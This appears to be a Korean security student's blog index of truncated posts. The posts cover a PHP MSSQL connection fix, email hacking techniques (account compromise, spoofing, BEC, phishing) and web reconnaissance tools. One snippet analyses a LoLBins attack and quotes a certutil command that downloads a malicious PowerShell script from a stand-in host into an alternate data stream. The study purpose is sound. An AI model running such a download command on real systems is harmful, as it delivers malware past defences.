[ Fatal error: Call to undefined function mssql_connect() in C:\APM_Setup\htdocs\mssql_connect.php on line 3 mssql_connect.php ] 해결 [내 상황] - APMSETUP 7 사용 중 - SQL Server 2019 - mssql php example 통해서 connect 테스트 중 " Undefined function 'mssql_connect' " - php.ini에서 extension=php_mssql.dll 주석 해제했음에도 불구하고 안됐다. - netstat -antp | find "1433" 해도 아무것도 안뜸 [해결] 1) C:\APM_Setup\Server\PHP5 안에서 ntwdblib.dll..

보호되어 있는 글입니다.

1. 이메일을 전송한 클라이언트의 IP 주소를 확인할 수 있는 필드 : X-Originating-IP 2. 이메일을 이용한 해킹 기법 - 이메일 계정을 해킹하여 도용하는 EAC(email account compromise) - 이메일 계정 해킹 없이 발신자를 그럴듯하게 위장하는 스푸핑 - BEC(business email compromise): 피해자가 평소 신뢰하고 있던 이메일로부터 들어오는 사기 공격 3. 특정 개인의 이메일 계정을 해킹하는 기법? - 키 로깅 통해 사용자가 입력하는 id passwd 수집 - 피싱 메일 통해 타겟의 password 입력하도록 유도 - 메일 서버의 취약점 이용하여 사용자 인증 우회 4. Message ID 분석 - Message ID는 MUA(mail user agen..

1. LoL Bins를 악용한 공격 스크립트 분석 certutil.exe -urlcache -split -f https://example.com/mal.ps1 c:\temp:zip 1) urlcache 옵션은 인증기관 인증서 설치를 위해 사용한다. ▶ URL 캐시 항목을 표시 또는 삭제하는 역할 2) 다운로드 받은 스크립트 파일은 ADS영역에 저장 ▶https://lolbas-project.github.io/lolbas/Binaries/Certutil/ 3) 스크립트 파일은 c:\temp에 zip 형태로 저장. 4) certutil은 저장된 사용자 이름과 암호 또는 자격 증명을 만들어 나열하고 삭제하는 역할. ▶ Cmdkey.exe 2. LoL Bins들 나열.. 이들의 기능 설명 1) Cmdkey.ex..

보호되어 있는 글입니다.

보호되어 있는 글입니다.

이전 게시글과의 구분용 게시글

[HTTrack] website copier라고 불리운다. 해당 툴을 사용하면 입력한 웹사이트를 그대로 복사하여 내 PC에 폴더-파일을 만들어줌. 그러니까.. 해당 웹 페이지의 모든 리소스(이미지, 페이지 파일, 첨부 파일 등..)를 다운로드하는 것. 폴더 구조까지 그대로 가져오기에 웹사이트 구조를 분석하기에 좋다. 관리자 페이지 찾는 용도로 사용 가능. [DirBuster] HTTrack은 모든 링크를 클릭해서 모든 파일을 다운로드한다면, DirBuster는 패스워드 크래킹하듯 모든 경로를 만들어서 입력해봄. 응답되는 상태 코드를 토대로 웹 페이지의 구조를 가져온다. 숨겨진 페이지 찾기 좋고, 존재하는 페이지만을 가져온다. 실 페이지에 사용 금지 ^__^